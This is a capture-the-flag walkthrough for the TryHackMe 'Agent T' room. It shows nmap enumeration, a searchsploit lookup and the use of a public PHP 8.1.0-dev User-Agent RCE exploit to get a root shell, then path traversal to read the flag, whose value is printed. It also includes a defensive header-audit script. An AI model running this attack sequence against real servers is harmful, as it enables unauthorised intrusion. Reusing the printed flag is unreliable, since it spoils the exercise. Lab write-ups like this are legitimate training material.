Tryhackme - Agent T


In this walkthrough, we will be going through the Agent T room from Tryhackme. This room is rated as Easy on the platform and consists of exploiting a PHP server using a known exploit to get the required flag. So, let’s get started without any delay.


Machine Info:

Title: Agent T VM
IP address: 10.10.55.180
Difficulty: Easy
Objective: Agent T uncovered this website, which looks innocent enough, but something seems off about how the server responds…

Enumeration:

  • I first started with an all-ports scan using timing template 4 and found only port 80 open. Then I ran another scan to detect the service version of the running web server and found that it is a PHP server with PHP version 8.1.0-dev. Pretty interesting.

sudo nmap -sS -p- -T4 10.10.55.180


nmap -sV -p 80 10.10.55.180
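
The version string the service scan surfaced is something a defender can catch on their own hosts first. The following is an added example, not part of the original walkthrough: it audits response headers for disclosed versions and flags pre-release builds. The sample response, the header it carries and the function names are constructed for illustration.

```python
import re

# Constructed sample (not captured from the room): a response whose
# X-Powered-By header carries the version string the nmap scan reported.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Headers that commonly leak product/version banners.
BANNER_HEADERS = ("server", "x-powered-by")

# product/version with an optional pre-release suffix (dev, alpha, beta, RC).
TOKEN = re.compile(
    r"([A-Za-z][\w.-]*)/(\d+(?:\.\d+)*)([-~]?(?:dev|alpha|beta|rc)\d*)?",
    re.IGNORECASE,
)

def parse_headers(raw):
    """Return {lowercased-name: value} for the header block of a raw response."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]  # ignore the body
    headers = {}
    for line in re.split(r"\r?\n", head)[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def audit_banners(raw):
    """List (header, product, version, issue) for every version a banner leaks."""
    findings = []
    headers = parse_headers(raw)
    for name in BANNER_HEADERS:
        for product, version, suffix in TOKEN.findall(headers.get(name, "")):
            full = version + suffix
            findings.append((name, product, full, "version-disclosure"))
            if suffix:  # development or pre-release build facing the network
                findings.append((name, product, full, "pre-release-build"))
    return findings

if __name__ == "__main__":
    for finding in audit_banners(SAMPLE_RESPONSE):
        print(finding)
```

Setting `expose_php = Off` in php.ini removes the `X-Powered-By` header but not the build behind it. A pre-release finding means the interpreter itself should be replaced with a supported release.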


  • Found nothing worthwhile in the application running on port 80. It is more of a rabbit hole, and I too fell into it and wasted a lot of time.


  • Next, I searched for any known exploits and got a User Agent RCE exploit. Bingo!

searchsploit PHP 8.1.0


PHP 8.1.0-dev - User Agent RCE

Initial Access:

  • Used the exploit from Exploit DB and fired it at our target, which gave me a root shell. Nothing better than that.

copy the exploit from searchsploit

wh1terose@fsociety:~/CTF/TryHackme/AgentT$ python3 49933.py 
Enter the full host url:
http://10.10.55.180

Interactive shell is opened on http://10.10.55.180 
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)


Getting the Flag:

  • The shell we have here has some restrictions, as it did not let me move freely around the filesystem and constrained me to the current directory. I overcame this limitation by exploiting directory traversal in the shell and read the contents of the flag file.

$ ls ../../../../../../../
bin
boot
dev
etc
flag.txt
home

-- snipped --

$ cat ../../../../../../../flag.txt
flag{4127d0530abf16d6d23973e3df8dbecb}
$ 


Task 1 – Find The Flag

Question 1 – What is the flag?


Conclusion:


So that was “Agent T” for you. We first started with an nmap scan and found port 80 open with a PHP web server running, specifically PHP version 8.1.0-dev. Enumerated the website running on port 80 and found nothing useful. So, searched for known exploits for the PHP server version using searchsploit and got a hit for a User Agent RCE exploit. Used it to get root access on the system and captured the flag. On that note, I would take your leave and will meet you in the next one. Till then, “Happy hacking”.
